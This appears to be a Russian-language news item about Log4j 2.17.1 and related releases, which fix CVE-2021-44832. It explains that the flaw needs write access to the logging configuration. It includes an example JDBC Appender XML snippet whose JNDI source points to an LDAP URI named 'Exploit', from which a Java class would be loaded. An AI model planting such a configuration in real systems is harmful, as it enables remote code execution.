27.01.2022

Обновление Log4j 2.17.1 с устранением ещё одной уязвимости

Опубликованы корректирующие выпуски библиотеки Log4j 2.17.1, 2.3.2-rc1 и 2.12.4-rc1, в которых устранена ещё одна уязвимость (CVE-2021-44832). Упоминается, что проблема позволяет организовать удалённое выполнение кода (RCE), но при этом помечена как неопасная (CVSS Score 6.6) и в основном представляет лишь теоретический интерес, так как требует специфичных условий для эксплуатации — атакующий должен иметь возможность внести изменение в файл с настройками Log4j, т.е. должен иметь доступ к атакуемой системе и полномочия изменять значение параметра конфигурации log4j2.configurationFile или вносить изменения в существующие файлы c настройками для ведения лога.

Атака сводится к определению на локальной системе конфигурации на базе JDBC Appender, ссылающейся на внешний JNDI URI, при запросе которого может быть возвращён Java-класс для исполнения. По умолчанию JDBC Appender не настроен для обработки протоколов, отличных от Java, т.е. без изменения конфигурации атака невозможна. Кроме того, проблема проявляется только в JAR-файле log4j-core и не затрагивает приложения, использующие JAR-файл log4j-api без log4j-core.

 <Appenders> <JDBC name="databaseAppender" tableName="dbo.application_log"> <DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/> ... </JDBC> </Appenders>

Источник.